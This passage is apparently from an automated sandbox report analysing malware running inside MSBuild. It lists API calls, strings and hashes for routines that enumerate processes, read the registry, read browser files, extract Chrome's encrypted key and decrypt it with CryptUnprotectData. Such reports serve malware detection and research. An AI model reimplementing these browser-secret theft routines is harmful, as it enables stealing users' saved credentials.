                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                        • String ID:
                                                                                        • API String ID: 1817501562-0
                                                                                        • Opcode ID: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
                                                                                        • Instruction ID: e53d099b401adf85f62220e949137e4eb195d033f19141da227454a58e436e12
                                                                                        • Opcode Fuzzy Hash: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
                                                                                        • Instruction Fuzzy Hash: C121ADB1A40259AFCB00DFA8CC81AEEBBB9EF89310F10856AF509D7350C7359941CBA4
                                                                                        Function 00410200 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00410238
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041024A
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004102A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 562399079-0
                                                                                        • Opcode ID: 6641976aa709788164a1774861f524becb7537c5be8e138fdb7114088aa02426
                                                                                        • Instruction ID: b719f9b5f692b2ac1a9fa5fbc0615dd86b5ea1c9724ba4ed1b36593775d07faa
                                                                                        • Opcode Fuzzy Hash: 6641976aa709788164a1774861f524becb7537c5be8e138fdb7114088aa02426
                                                                                        • Instruction Fuzzy Hash: 111194326001186BDB15EB56DC06BFE737DAF84B00F00417EF605E2191DF785A4A8BE9
                                                                                        Function 0040FD30 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,01690790,00000000,00020119,00000000), ref: 0040FD6B
                                                                                        • RegQueryValueExA.KERNEL32(00000000,01699B08,00000000,00000000,00000000,000000FF), ref: 0040FD86
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040FD90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3466090806-0
                                                                                        • Opcode ID: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
                                                                                        • Instruction ID: d8ad9fbc0ebf95024768528cc8c117c10f0d608e1468c19e6a8aac0af7a2ce34
                                                                                        • Opcode Fuzzy Hash: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
                                                                                        • Instruction Fuzzy Hash: 31F049B5600208BFE710ABA0EC49EAB7BBDEB48755F002158FA05E6280D6B099008BE0
                                                                                        Function 00406FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentVariableA.KERNEL32(0168EF58,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,0040B90C,016996B0), ref: 00406FE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • SetEnvironmentVariableA.KERNEL32(0168EF58,00000000,00000000,?,00423404,?,0040B90C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004201E9), ref: 0040704F
                                                                                        • LoadLibraryA.KERNEL32(01699F88,?,?,?,?,?,?,?,0040B90C,016996B0), ref: 00407064
                                                                                        Strings
                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00406FE0, 00406FF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                        • API String ID: 2929475105-3463377506
                                                                                        • Opcode ID: 153a59643373ad953a9b1375373b88862291436906786ae9e59a005ac368b341
                                                                                        • Instruction ID: 3674f494c0927660592f126ebe4d752a07d6e352543a463b58e450960cf84051
                                                                                        • Opcode Fuzzy Hash: 153a59643373ad953a9b1375373b88862291436906786ae9e59a005ac368b341
                                                                                        • Instruction Fuzzy Hash: 0041A471A049049FC724FFE5EC45AAA33BAEB44304F04953EE401672E1DFB8690ACF96
                                                                                        Function 004142A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100sleepsynchronizationthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateObjectSingleSleepThreadWait
                                                                                        • String ID: =OA
                                                                                        • API String ID: 4198075804-2781383965
                                                                                        • Opcode ID: cc271842d029b86fb39d1d846deebb3d4296266582d11a6ea1b6c9d8d0dbe55f
                                                                                        • Instruction ID: c815e327a45929293fb115344fed98bb65589d785c8a70cda2a6ba11b763288e
                                                                                        • Opcode Fuzzy Hash: cc271842d029b86fb39d1d846deebb3d4296266582d11a6ea1b6c9d8d0dbe55f
                                                                                        • Instruction Fuzzy Hash: D6416E729102089BDB24FFA1DC42BED7779AF54304F54903EF902765D2DB386A49CBA8
                                                                                        Function 00411280 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00412B26,?), ref: 004112A0
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00412B26,?), ref: 004112CB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00412B26,?), ref: 004112D6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                        • String ID: &+A
                                                                                        • API String ID: 1065093856-3022679855
                                                                                        • Opcode ID: e5b192d5b7a298d05ce5f2ae07f8f396dfdf33a0d21f00f1cb426f39e4b2f259
                                                                                        • Instruction ID: e3584a1bd73763bab08ea096363b5fafa1b3dc09f005f439864d535dca2b5911
                                                                                        • Opcode Fuzzy Hash: e5b192d5b7a298d05ce5f2ae07f8f396dfdf33a0d21f00f1cb426f39e4b2f259
                                                                                        • Instruction Fuzzy Hash: 6FF08C316402187ADA20EF61EC07FEA376CDB01760F00526AFA09A65D0DBB06D4586E8
                                                                                        Function 0040B180 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 157stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00423544,004201E9), ref: 0040B224
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040B240
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                        • API String ID: 161838763-3310892237
                                                                                        • Opcode ID: 5b06250b52101bc78d6f4f105a3c9b98acbab95c31c3b8f2825379732b3d5802
                                                                                        • Instruction ID: bbf64b21a70ba96c4e7d34df4571fb99f0a9ed04e141873abf1496de80f97976
                                                                                        • Opcode Fuzzy Hash: 5b06250b52101bc78d6f4f105a3c9b98acbab95c31c3b8f2825379732b3d5802
                                                                                        • Instruction Fuzzy Hash: B951FD729101186BDB24FB71DD529ED7378AF54704F44813EF806729D2EF386A0CCAA9
                                                                                        Function 004130F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00413120
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004131CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ERROR
                                                                                        • API String ID: 1659193697-2861137601
                                                                                        • Opcode ID: 0be82df5096fbdc7b645b95910ef4257ac8856a976d54f11a5ce5c5baab4e6dd
                                                                                        • Instruction ID: fa0f609c73550b9905e9a4c97c517d243e9d7e9da07ba45fb7ad886b791ba49f
                                                                                        • Opcode Fuzzy Hash: 0be82df5096fbdc7b645b95910ef4257ac8856a976d54f11a5ce5c5baab4e6dd
                                                                                        • Instruction Fuzzy Hash: 03315072A00204ABCB10FF65D846BDE7B78EB44754F10813EF915A76C1DB38A649CBD9
                                                                                        Function 0040BE30 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,?,?,?,?,?,0040EC99,?), ref: 0040BE7D
                                                                                          • Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406CF7
                                                                                          • Part of subcall function 00406CD0: LocalAlloc.KERNEL32(00000040,00000000,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D06
                                                                                          • Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406D1D
                                                                                          • Part of subcall function 00406CD0: LocalFree.KERNEL32(?,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D2C
                                                                                          • Part of subcall function 00406D50: CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
                                                                                          • Part of subcall function 00406D50: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
                                                                                          • Part of subcall function 00406D50: LocalFree.KERNEL32(?), ref: 00406DAE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                        • String ID: $"encrypted_key":"
                                                                                        • API String ID: 2311102621-1472317035
